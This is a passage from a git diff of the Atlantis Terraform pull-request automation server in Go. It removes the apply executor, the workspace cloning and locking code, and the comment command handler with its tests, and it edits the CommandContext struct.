- Run *run.Run
- AtlantisWorkspace AtlantisWorkspace
- ProjectPreExecute *DefaultProjectPreExecutor
- Webhooks webhooks.Sender
-}
-
-// Execute executes apply for the ctx.
-func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse {
- if a.RequireApproval {
- approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull)
- if err != nil {
- return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")}
- }
- if !approved {
- return CommandResponse{Failure: "Pull request must be approved before running apply."}
- }
- ctx.Log.Info("confirmed pull request was approved")
- }
-
- repoDir, err := a.AtlantisWorkspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace)
- if err != nil {
- return CommandResponse{Failure: "No workspace found. Did you run plan?"}
- }
- ctx.Log.Info("found workspace in %q", repoDir)
-
- // Plans are stored at project roots by their workspace names. We just
- // need to find them.
- var plans []models.Plan
- // If they didn't specify a directory, we apply all plans we can find for
- // this workspace.
- if ctx.Command.Dir == "" {
- err = filepath.Walk(repoDir, func(path string, info os.FileInfo, err error) error {
- if err != nil {
- return err
- }
- // Check if the plan is for the right workspace,
- if !info.IsDir() && info.Name() == ctx.Command.Workspace+".tfplan" {
- rel, _ := filepath.Rel(repoDir, filepath.Dir(path))
- plans = append(plans, models.Plan{
- Project: models.NewProject(ctx.BaseRepo.FullName, rel),
- LocalPath: path,
- })
- }
- return nil
- })
- if err != nil {
- return CommandResponse{Error: errors.Wrap(err, "finding plans")}
- }
- } else {
- // If they did specify a dir, we apply just the plan in that directory
- // for this workspace.
- planPath := filepath.Join(repoDir, ctx.Command.Dir, ctx.Command.Workspace+".tfplan")
- stat, err := os.Stat(planPath)
- if err != nil || stat.IsDir() {
- return CommandResponse{Error: fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.Command.Dir, ctx.Command.Workspace)}
- }
- relProjectPath, _ := filepath.Rel(repoDir, filepath.Dir(planPath))
- plans = append(plans, models.Plan{
- Project: models.NewProject(ctx.BaseRepo.FullName, relProjectPath),
- LocalPath: planPath,
- })
- }
- if len(plans) == 0 {
- return CommandResponse{Failure: "No plans found for that workspace."}
- }
- var paths []string
- for _, p := range plans {
- paths = append(paths, p.LocalPath)
- }
- ctx.Log.Info("found %d plan(s) in our workspace: %v", len(plans), paths)
-
- var results []ProjectResult
- for _, plan := range plans {
- ctx.Log.Info("running apply for project at path %q", plan.Project.Path)
- result := a.apply(ctx, repoDir, plan)
- result.Path = plan.LocalPath
- results = append(results, result)
- }
- return CommandResponse{ProjectResults: results}
-}
-
-func (a *ApplyExecutor) apply(ctx *CommandContext, repoDir string, plan models.Plan) ProjectResult {
- preExecute := a.ProjectPreExecute.Execute(ctx, repoDir, plan.Project)
- if preExecute.ProjectResult != (ProjectResult{}) {
- return preExecute.ProjectResult
- }
- config := preExecute.ProjectConfig
- terraformVersion := preExecute.TerraformVersion
-
- applyExtraArgs := config.GetExtraArguments(ctx.Command.Name.String())
- absolutePath := filepath.Join(repoDir, plan.Project.Path)
- workspace := ctx.Command.Workspace
- tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, applyExtraArgs...), ctx.Command.Flags...), plan.LocalPath)
- output, err := a.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, tfApplyCmd, terraformVersion, workspace)
-
- a.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck
- Workspace: workspace,
- User: ctx.User,
- Repo: ctx.BaseRepo,
- Pull: ctx.Pull,
- Success: err == nil,
- })
-
- if err != nil {
- return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)}
- }
- ctx.Log.Info("apply succeeded")
-
- if len(config.PostApply) > 0 {
- _, err := a.Run.Execute(ctx.Log, config.PostApply, absolutePath, workspace, terraformVersion, "post_apply")
- if err != nil {
- return ProjectResult{Error: errors.Wrap(err, "running post apply commands")}
- }
- }
-
- return ProjectResult{ApplySuccess: output}
-}
diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go
deleted file mode 100644
index a57aee053f..0000000000
--- a/server/events/atlantis_workspace.go
+++ /dev/null
@@ -1,106 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "os"
- "os/exec"
- "path/filepath"
- "strconv"
-
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/logging"
-)
-
-const workspacePrefix = "repos"
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_atlantis_workspace.go AtlantisWorkspace
-
-// AtlantisWorkspace handles the workspace on disk for running commands.
-type AtlantisWorkspace interface {
- // Clone git clones headRepo, checks out the branch and then returns the
- // absolute path to the root of the cloned repo.
- Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error)
- // GetWorkspace returns the path to the workspace for this repo and pull.
- GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error)
- // Delete deletes the workspace for this repo and pull.
- Delete(r models.Repo, p models.PullRequest) error
-}
-
-// FileWorkspace implements AtlantisWorkspace with the file system.
-type FileWorkspace struct {
- DataDir string
-}
-
-// Clone git clones headRepo, checks out the branch and then returns the absolute
-// path to the root of the cloned repo.
-func (w *FileWorkspace) Clone(
- log *logging.SimpleLogger,
- baseRepo models.Repo,
- headRepo models.Repo,
- p models.PullRequest,
- workspace string) (string, error) {
- cloneDir := w.cloneDir(baseRepo, p, workspace)
-
- // This is safe to do because we lock runs on repo/pull/workspace so no one else
- // is using this workspace.
- log.Info("cleaning clone directory %q", cloneDir)
- if err := os.RemoveAll(cloneDir); err != nil {
- return "", errors.Wrap(err, "deleting old workspace")
- }
-
- // Create the directory and parents if necessary.
- log.Info("creating dir %q", cloneDir)
- if err := os.MkdirAll(cloneDir, 0700); err != nil {
- return "", errors.Wrap(err, "creating new workspace")
- }
-
- log.Info("git cloning %q into %q", headRepo.SanitizedCloneURL, cloneDir)
- cloneCmd := exec.Command("git", "clone", headRepo.CloneURL, cloneDir) // #nosec
- if output, err := cloneCmd.CombinedOutput(); err != nil {
- return "", errors.Wrapf(err, "cloning %s: %s", headRepo.SanitizedCloneURL, string(output))
- }
-
- // Check out the branch for this PR.
- log.Info("checking out branch %q", p.Branch)
- checkoutCmd := exec.Command("git", "checkout", p.Branch) // #nosec
- checkoutCmd.Dir = cloneDir
- if err := checkoutCmd.Run(); err != nil {
- return "", errors.Wrapf(err, "checking out branch %s", p.Branch)
- }
- return cloneDir, nil
-}
-
-// GetWorkspace returns the path to the workspace for this repo and pull.
-func (w *FileWorkspace) GetWorkspace(r models.Repo, p models.PullRequest, workspace string) (string, error) {
- repoDir := w.cloneDir(r, p, workspace)
- if _, err := os.Stat(repoDir); err != nil {
- return "", errors.Wrap(err, "checking if workspace exists")
- }
- return repoDir, nil
-}
-
-// Delete deletes the workspace for this repo and pull.
-func (w *FileWorkspace) Delete(r models.Repo, p models.PullRequest) error {
- return os.RemoveAll(w.repoPullDir(r, p))
-}
-
-func (w *FileWorkspace) repoPullDir(r models.Repo, p models.PullRequest) string {
- return filepath.Join(w.DataDir, workspacePrefix, r.FullName, strconv.Itoa(p.Num))
-}
-
-func (w *FileWorkspace) cloneDir(r models.Repo, p models.PullRequest, workspace string) string {
- return filepath.Join(w.repoPullDir(r, p), workspace)
-}
diff --git a/server/events/atlantis_workspace_locker.go b/server/events/atlantis_workspace_locker.go
deleted file mode 100644
index 594ea08ab6..0000000000
--- a/server/events/atlantis_workspace_locker.go
+++ /dev/null
@@ -1,74 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "sync"
-)
-
-//go:generate pegomock generate --use-experimental-model-gen --package mocks -o mocks/mock_atlantis_workspace_locker.go AtlantisWorkspaceLocker
-
-// AtlantisWorkspaceLocker is used to prevent multiple commands from executing
-// at the same time for a single repo, pull, and workspace. We need to prevent
-// this from happening because a specific repo/pull/workspace has a single workspace
-// on disk and we haven't written Atlantis (yet) to handle concurrent execution
-// within this workspace.
-// This locker is called AtlantisWorkspaceLocker to differentiate it from the
-// Terraform concept of workspaces, not directories on disk managed by Atlantis.
-type AtlantisWorkspaceLocker interface {
- // TryLock tries to acquire a lock for this repo, workspace and pull.
- TryLock(repoFullName string, workspace string, pullNum int) bool
- // Unlock deletes the lock for this repo, workspace and pull. If there was no
- // lock it will do nothing.
- Unlock(repoFullName, workspace string, pullNum int)
-}
-
-// DefaultAtlantisWorkspaceLocker implements AtlantisWorkspaceLocker.
-type DefaultAtlantisWorkspaceLocker struct {
- mutex sync.Mutex
- locks map[string]interface{}
-}
-
-// NewDefaultAtlantisWorkspaceLocker is a constructor.
-func NewDefaultAtlantisWorkspaceLocker() *DefaultAtlantisWorkspaceLocker {
- return &DefaultAtlantisWorkspaceLocker{
- locks: make(map[string]interface{}),
- }
-}
-
-// TryLock returns true if a lock is acquired for this repo, pull and workspace and
-// false otherwise.
-func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool {
- d.mutex.Lock()
- defer d.mutex.Unlock()
-
- key := d.key(repoFullName, workspace, pullNum)
- if _, ok := d.locks[key]; !ok {
- d.locks[key] = true
- return true
- }
- return false
-}
-
-// Unlock unlocks the repo, pull and workspace.
-func (d *DefaultAtlantisWorkspaceLocker) Unlock(repoFullName, workspace string, pullNum int) {
- d.mutex.Lock()
- defer d.mutex.Unlock()
- delete(d.locks, d.key(repoFullName, workspace, pullNum))
-}
-
-func (d *DefaultAtlantisWorkspaceLocker) key(repo string, workspace string, pull int) string {
- return fmt.Sprintf("%s/%s/%d", repo, workspace, pull)
-}
diff --git a/server/events/atlantis_workspace_locker_test.go b/server/events/atlantis_workspace_locker_test.go
deleted file mode 100644
index 389f1e7df6..0000000000
--- a/server/events/atlantis_workspace_locker_test.go
+++ /dev/null
@@ -1,116 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "testing"
-
- "github.com/runatlantis/atlantis/server/events"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var repo = "repo/owner"
-var workspace = "default"
-
-func TestTryLock(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("the first lock should succeed")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
-
- t.Log("now another lock for the same repo, workspace, and pull should fail")
- Equals(t, false, locker.TryLock(repo, workspace, 1))
-}
-
-func TestTryLockDifferentWorkspaces(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("a lock for the same repo and pull but different workspace should succeed")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
-
- t.Log("and both should now be locked")
- Equals(t, false, locker.TryLock(repo, workspace, 1))
- Equals(t, false, locker.TryLock(repo, "new-workspace", 1))
-}
-
-func TestTryLockDifferentRepo(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("a lock for a different repo but the same workspace and pull should succeed")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- newRepo := "owner/newrepo"
- Equals(t, true, locker.TryLock(newRepo, workspace, 1))
-
- t.Log("and both should now be locked")
- Equals(t, false, locker.TryLock(repo, workspace, 1))
- Equals(t, false, locker.TryLock(newRepo, workspace, 1))
-}
-
-func TestTryLockDifferent1(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("a lock for a different pull but the same repo and workspace should succeed")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- new1 := 2
- Equals(t, true, locker.TryLock(repo, workspace, new1))
-
- t.Log("and both should now be locked")
- Equals(t, false, locker.TryLock(repo, workspace, 1))
- Equals(t, false, locker.TryLock(repo, workspace, new1))
-}
-
-func TestUnlock(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
-
- t.Log("unlocking should work")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- locker.Unlock(repo, workspace, 1)
- Equals(t, true, locker.TryLock(repo, workspace, 1))
-}
-
-func TestUnlockDifferentWorkspaces(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
- t.Log("unlocking should work for different workspaces")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
- locker.Unlock(repo, workspace, 1)
- locker.Unlock(repo, "new-workspace", 1)
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(repo, "new-workspace", 1))
-}
-
-func TestUnlockDifferentRepos(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
- t.Log("unlocking should work for different repos")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- newRepo := "owner/newrepo"
- Equals(t, true, locker.TryLock(newRepo, workspace, 1))
- locker.Unlock(repo, workspace, 1)
- locker.Unlock(newRepo, workspace, 1)
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(newRepo, workspace, 1))
-}
-
-func TestUnlockDifferentPulls(t *testing.T) {
- locker := events.NewDefaultAtlantisWorkspaceLocker()
- t.Log("unlocking should work for different 1s")
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- new1 := 2
- Equals(t, true, locker.TryLock(repo, workspace, new1))
- locker.Unlock(repo, workspace, 1)
- locker.Unlock(repo, workspace, new1)
- Equals(t, true, locker.TryLock(repo, workspace, 1))
- Equals(t, true, locker.TryLock(repo, workspace, new1))
-}
diff --git a/server/events/command_context.go b/server/events/command_context.go
index 35a2a1b141..49b0f07268 100644
--- a/server/events/command_context.go
+++ b/server/events/command_context.go
@@ -18,8 +18,8 @@ import (
"github.com/runatlantis/atlantis/server/logging"
)
-// CommandContext represents the context of a command that came from a comment
-// on a pull request.
+// CommandContext represents the context of a command that should be executed
+// for a pull request.
type CommandContext struct {
// BaseRepo is the repository that the pull request will be merged into.
BaseRepo models.Repo
@@ -30,7 +30,6 @@ type CommandContext struct {
HeadRepo models.Repo
Pull models.PullRequest
// User is the user that triggered this command.
- User models.User
- Command *Command
- Log *logging.SimpleLogger
+ User models.User
+ Log *logging.SimpleLogger
}
diff --git a/server/events/command_handler.go b/server/events/command_handler.go
deleted file mode 100644
index 52dd2090bd..0000000000
--- a/server/events/command_handler.go
+++ /dev/null
@@ -1,213 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
-
- "github.com/google/go-github/github"
- "github.com/lkysow/go-gitlab"
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/vcs"
- "github.com/runatlantis/atlantis/server/logging"
- "github.com/runatlantis/atlantis/server/recovery"
-)
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_command_runner.go CommandRunner
-
-// CommandRunner is the first step after a command request has been parsed.
-type CommandRunner interface {
- // ExecuteCommand is the first step after a command request has been parsed.
- // It handles gathering additional information needed to execute the command
- // and then calling the appropriate services to finish executing the command.
- ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command)
-}
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_github_pull_getter.go GithubPullGetter
-
-// GithubPullGetter makes API calls to get pull requests.
-type GithubPullGetter interface {
- // GetPullRequest gets the pull request with id pullNum for the repo.
- GetPullRequest(repo models.Repo, pullNum int) (*github.PullRequest, error)
-}
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_merge_request_getter.go GitlabMergeRequestGetter
-
-// GitlabMergeRequestGetter makes API calls to get merge requests.
-type GitlabMergeRequestGetter interface {
- // GetMergeRequest gets the pull request with the id pullNum for the repo.
- GetMergeRequest(repoFullName string, pullNum int) (*gitlab.MergeRequest, error)
-}
-
-// CommandHandler is the first step when processing a comment command.
-type CommandHandler struct {
- PlanExecutor Executor
- ApplyExecutor Executor
- LockURLGenerator LockURLGenerator
- VCSClient vcs.ClientProxy
- GithubPullGetter GithubPullGetter
- GitlabMergeRequestGetter GitlabMergeRequestGetter
- CommitStatusUpdater CommitStatusUpdater
- EventParser EventParsing
- AtlantisWorkspaceLocker AtlantisWorkspaceLocker
- MarkdownRenderer *MarkdownRenderer
- Logger logging.SimpleLogging
- // AllowForkPRs controls whether we operate on pull requests from forks.
- AllowForkPRs bool
- // AllowForkPRsFlag is the name of the flag that controls fork PR's. We use
- // this in our error message back to the user on a forked PR so they know
- // how to enable this functionality.
- AllowForkPRsFlag string
-}
-
-// ExecuteCommand executes the command.
-// If the repo is from GitHub, we don't use headRepo and instead make an API call
-// to get the headRepo. This is because the caller is unable to pass in a
-// headRepo since there's not enough data available on the initial webhook
-// payload.
-func (c *CommandHandler) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command) {
- log := c.buildLogger(baseRepo.FullName, pullNum)
-
- var err error
- var pull models.PullRequest
- switch baseRepo.VCSHost.Type {
- case models.Github:
- pull, headRepo, err = c.getGithubData(baseRepo, pullNum)
- case models.Gitlab:
- pull, err = c.getGitlabData(baseRepo, pullNum)
- default:
- err = errors.New("Unknown VCS type, this is a bug!")
- }
- if err != nil {
- log.Err(err.Error())
- return
- }
- ctx := &CommandContext{
- User: user,
- Log: log,
- Pull: pull,
- HeadRepo: headRepo,
- Command: cmd,
- BaseRepo: baseRepo,
- }
- c.run(ctx)
-}
-
-func (c *CommandHandler) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) {
- if c.GithubPullGetter == nil {
- return models.PullRequest{}, models.Repo{}, errors.New("Atlantis not configured to support GitHub")
- }
- ghPull, err := c.GithubPullGetter.GetPullRequest(baseRepo, pullNum)
- if err != nil {
- return models.PullRequest{}, models.Repo{}, errors.Wrap(err, "making pull request API call to GitHub")
- }
- pull, repo, err := c.EventParser.ParseGithubPull(ghPull)
- if err != nil {
- return pull, repo, errors.Wrap(err, "extracting required fields from comment data")
- }
- return pull, repo, nil
-}
-
-func (c *CommandHandler) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) {
- if c.GitlabMergeRequestGetter == nil {
- return models.PullRequest{}, errors.New("Atlantis not configured to support GitLab")
- }
- mr, err := c.GitlabMergeRequestGetter.GetMergeRequest(baseRepo.FullName, pullNum)
- if err != nil {
- return models.PullRequest{}, errors.Wrap(err, "making merge request API call to GitLab")
- }
- pull := c.EventParser.ParseGitlabMergeRequest(mr, baseRepo)
- return pull, nil
-}
-
-func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger {
- src := fmt.Sprintf("%s#%d", repoFullName, pullNum)
- return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel())
-}
-
-// SetLockURL sets a function that's used to return the URL for a lock.
-func (c *CommandHandler) SetLockURL(f func(id string) (url string)) {
- c.LockURLGenerator.SetLockURL(f)
-}
-
-func (c *CommandHandler) run(ctx *CommandContext) {
- log := c.buildLogger(ctx.BaseRepo.FullName, ctx.Pull.Num)
- ctx.Log = log
- defer c.logPanics(ctx)
-
- if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner {
- ctx.Log.Info("command was run on a fork pull request which is disallowed")
- c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, fmt.Sprintf("Atlantis commands can't be run on fork pull requests. To enable, set --%s", c.AllowForkPRsFlag)) // nolint: errcheck
- return
- }
-
- if ctx.Pull.State != models.Open {
- ctx.Log.Info("command was run on closed pull request")
- c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, "Atlantis commands can't be run on closed pull requests") // nolint: errcheck
- return
- }
-
- if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, ctx.Command); err != nil {
- ctx.Log.Warn("unable to update commit status: %s", err)
- }
- if !c.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) {
- errMsg := fmt.Sprintf(
- "The %s workspace is currently locked by another"+
- " command that is running for this pull request."+
- " Wait until the previous command is complete and try again.",
- ctx.Command.Workspace)
- ctx.Log.Warn(errMsg)
- c.updatePull(ctx, CommandResponse{Failure: errMsg})
- return
- }
- defer c.AtlantisWorkspaceLocker.Unlock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num)
-
- var cr CommandResponse
- switch ctx.Command.Name {
- case Plan:
- cr = c.PlanExecutor.Execute(ctx)
- case Apply:
- cr = c.ApplyExecutor.Execute(ctx)
- default:
- ctx.Log.Err("failed to determine desired command, neither plan nor apply")
- }
- c.updatePull(ctx, cr)
-}
-
-func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) {
- // Log if we got any errors or failures.
- if res.Error != nil {
- ctx.Log.Err(res.Error.Error())
- } else if res.Failure != "" {
- ctx.Log.Warn(res.Failure)
- }
-
- // Update the pull request's status icon and comment back.
- if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, res); err != nil {
- ctx.Log.Warn("unable to update commit status: %s", err)
- }
- comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose)
- c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck
-}
-
-// logPanics logs and creates a comment on the pull request for panics.
-func (c *CommandHandler) logPanics(ctx *CommandContext) {
- if err := recover(); err != nil {
- stack := recovery.Stack(3)
- c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, // nolint: errcheck
- fmt.Sprintf("**Error: goroutine panic. This is a bug.**\n```\n%s\n%s```", err, stack))
- ctx.Log.Err("PANIC: %s\n%s", err, stack)
- }
-}
diff --git a/server/events/command_handler_test.go b/server/events/command_handler_test.go
deleted file mode 100644
index 598ed6e234..0000000000
--- a/server/events/command_handler_test.go
+++ /dev/null
@@ -1,250 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "bytes"
- "errors"
- "log"
- "strings"
- "testing"
-
- "github.com/google/go-github/github"
- . "github.com/petergtz/pegomock"
- "github.com/runatlantis/atlantis/server/events"
- "github.com/runatlantis/atlantis/server/events/mocks"
- "github.com/runatlantis/atlantis/server/events/mocks/matchers"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/models/fixtures"
- "github.com/runatlantis/atlantis/server/events/vcs"
- vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
- logmocks "github.com/runatlantis/atlantis/server/logging/mocks"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var applier *mocks.MockExecutor
-var planner *mocks.MockExecutor
-var eventParsing *mocks.MockEventParsing
-var vcsClient *vcsmocks.MockClientProxy
-var ghStatus *mocks.MockCommitStatusUpdater
-var githubGetter *mocks.MockGithubPullGetter
-var gitlabGetter *mocks.MockGitlabMergeRequestGetter
-var workspaceLocker *mocks.MockAtlantisWorkspaceLocker
-var ch events.CommandHandler
-var logBytes *bytes.Buffer
-
-func setup(t *testing.T) {
- RegisterMockTestingT(t)
- applier = mocks.NewMockExecutor()
- planner = mocks.NewMockExecutor()
- eventParsing = mocks.NewMockEventParsing()
- ghStatus = mocks.NewMockCommitStatusUpdater()
- workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker()
- vcsClient = vcsmocks.NewMockClientProxy()
- githubGetter = mocks.NewMockGithubPullGetter()
- gitlabGetter = mocks.NewMockGitlabMergeRequestGetter()
- logger := logmocks.NewMockSimpleLogging()
- logBytes = new(bytes.Buffer)
- When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0))
- ch = events.CommandHandler{
- PlanExecutor: planner,
- ApplyExecutor: applier,
- VCSClient: vcsClient,
- CommitStatusUpdater: ghStatus,
- EventParser: eventParsing,
- AtlantisWorkspaceLocker: workspaceLocker,
- MarkdownRenderer: &events.MarkdownRenderer{},
- GithubPullGetter: githubGetter,
- GitlabMergeRequestGetter: gitlabGetter,
- Logger: logger,
- AllowForkPRs: false,
- AllowForkPRsFlag: "allow-fork-prs-flag",
- }
-}
-
-func TestExecuteCommand_LogPanics(t *testing.T) {
- t.Log("if there is a panic it is commented back on the pull request")
- setup(t)
- ch.AllowForkPRs = true // Lets us get to the panic code.
- defer func() { ch.AllowForkPRs = false }()
- When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, nil)).ThenPanic("panic")
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil)
- _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments()
- Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
-}
-
-func TestExecuteCommand_NoGithubPullGetter(t *testing.T) {
- t.Log("if CommandHandler was constructed with a nil GithubPullGetter an error should be logged")
- setup(t)
- ch.GithubPullGetter = nil
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
-}
-
-func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) {
- t.Log("if CommandHandler was constructed with a nil GitlabMergeRequestGetter an error should be logged")
- setup(t)
- ch.GitlabMergeRequestGetter = nil
- ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, 1, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
-}
-
-func TestExecuteCommand_GithubPullErr(t *testing.T) {
- t.Log("if getting the github pull request fails an error should be logged")
- setup(t)
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) {
- t.Log("if getting the gitlab merge request fails an error should be logged")
- setup(t)
- When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
- ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_GithubPullParseErr(t *testing.T) {
- t.Log("if parsing the returned github pull request fails an error should be logged")
- setup(t)
- var pull github.PullRequest
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
- When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err"))
-
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_ForkPRDisabled(t *testing.T) {
- t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
- " comment saying that this is not allowed")
- setup(t)
